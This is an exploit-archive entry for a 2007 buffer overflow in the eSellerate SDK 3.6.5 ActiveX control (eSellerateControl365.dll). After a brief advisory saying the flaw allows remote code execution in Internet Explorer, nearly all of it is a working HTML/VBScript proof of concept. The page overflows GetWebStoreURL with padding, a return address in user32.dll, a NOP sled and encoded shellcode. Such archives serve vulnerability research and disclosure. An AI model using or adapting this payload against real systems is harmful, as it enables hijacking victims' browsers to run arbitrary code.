eSellerate SDK 3.6.5 - eSellerateControl365.dll ActiveX Control Buffer Overflow

2007-06-04T00:00:00
ID EXPLOITPACK:0E52F8769CA4A099B36F636C73BBEC15
Type exploitpack
Reporter shinnai
Modified 2007-06-04T00:00:00

Description

eSellerate SDK 3.6.5 - eSellerateControl365.dll ActiveX Control Buffer Overflow

                                        
                                            source: https://www.securityfocus.com/bid/24300/info

eSellerate SDK ActiveX control is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

This issue affects eSellerate SDK 3.6.5.0; other versions may also be affected. 

<object classid='clsid:C915F573-4C11-4968-9080-29E611FDBE9F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language = 'vbscript'>
Sub tryMe()
 buff      = String(997, "A")

 get_EIP   = unescape("%6B%AC%3F%7E") '0x7E3FAC6B call EBP from user32.dll

 nop       = String(24, unescape("%90"))

 shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
             unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
             unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
             unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
             unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
             unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
             unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
             unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
             unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
             unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
             unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
             unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
             unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
             unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
             unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
             unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
             unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
             unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
             unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
             unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
             unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
             unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")

 egg       = buff + get_EIP + nop + shellcode + nop

 test.GetWebStoreURL egg, "default"
End Sub
</script>